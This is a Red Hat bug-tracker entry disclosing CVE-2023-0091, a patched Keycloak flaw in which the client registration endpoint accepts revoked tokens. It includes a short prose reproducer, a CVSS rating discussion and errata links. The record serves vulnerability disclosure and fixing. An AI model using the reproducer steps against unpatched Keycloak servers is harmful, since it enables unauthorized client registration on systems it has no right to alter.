Bug 2158585 (CVE-2023-0091)

Summary: CVE-2023-0091 keycloak: Client Registration endpoint does not check token revocation
Product: [Other] Security Response Reporter: mulliken
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: boliveir, chazlett, drichtar, jkoops, pdelbell, pdrozd, peholase, pesilva, pjindal, pskopek, rmartinc, rowaters, sthorger
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: keycloak 20.0.3 Doc Type: If docs needed, set a value
Doc Text:
A flaw was found in Keycloak, where it did not properly check client tokens for possible revocation in its client credential flow. This flaw allows an attacker to access or modify potentially sensitive information.
 Story Points: ---
Clone Of: Environment:
Last Closed: 2023-03-02 01:50:58 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On:    
Bug Blocks: 2158586    

Description mulliken 2023-01-05 18:56:21 UTC 
/clients-registrations/openid-connect could consume an invalidated token and register a new client.

Reproducer:
1. Generate a token for service-account using the client_credentials flow
2. Revoke the token using the /revoke endpoint passing in the above token.
3. Now, invoke /clients-registrations/openid-connect passing in the above generated token for auth
4. A client is created using the token
Comment 6 Patrick Del Bello 2023-02-22 14:37:29 UTC 
CVSS Explanation on privileges required:

Privileges Required: (H) instead of (N)

The CVSS Metric for Privileges Required is expected to be "High". This is explained in the flaw description as the attacker requires access to the access token that was meant to be revoked. This follows the CVSS Metric Definition: "The attacker requires privileges that provide significant (e.g., administrative) control over the vulnerable component allowing access to component-wide settings and files."
Considering the above information, a previous privilege is require prior the attacker jeopardize the environment.
Comment 7 errata-xmlrpc 2023-03-01 21:44:09 UTC 
This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.6 for RHEL 7

Via RHSA-2023:1043 https://access.redhat.com/errata/RHSA-2023:1043
Comment 8 errata-xmlrpc 2023-03-01 21:46:39 UTC 
This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.6 for RHEL 8

Via RHSA-2023:1044 https://access.redhat.com/errata/RHSA-2023:1044
Comment 9 errata-xmlrpc 2023-03-01 21:49:06 UTC 
This issue has been addressed in the following products:

  Red Hat Single Sign-On 7.6 for RHEL 9

Via RHSA-2023:1045 https://access.redhat.com/errata/RHSA-2023:1045
Comment 10 errata-xmlrpc 2023-03-01 21:50:04 UTC 
This issue has been addressed in the following products:

  RHEL-8 based Middleware Containers

Via RHSA-2023:1047 https://access.redhat.com/errata/RHSA-2023:1047
Comment 11 errata-xmlrpc 2023-03-01 22:00:13 UTC 
This issue has been addressed in the following products:

  Red Hat Single Sign-On

Via RHSA-2023:1049 https://access.redhat.com/errata/RHSA-2023:1049
Comment 12 Product Security DevOps Team 2023-03-02 01:50:56 UTC 
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):

https://access.redhat.com/security/cve/cve-2023-0091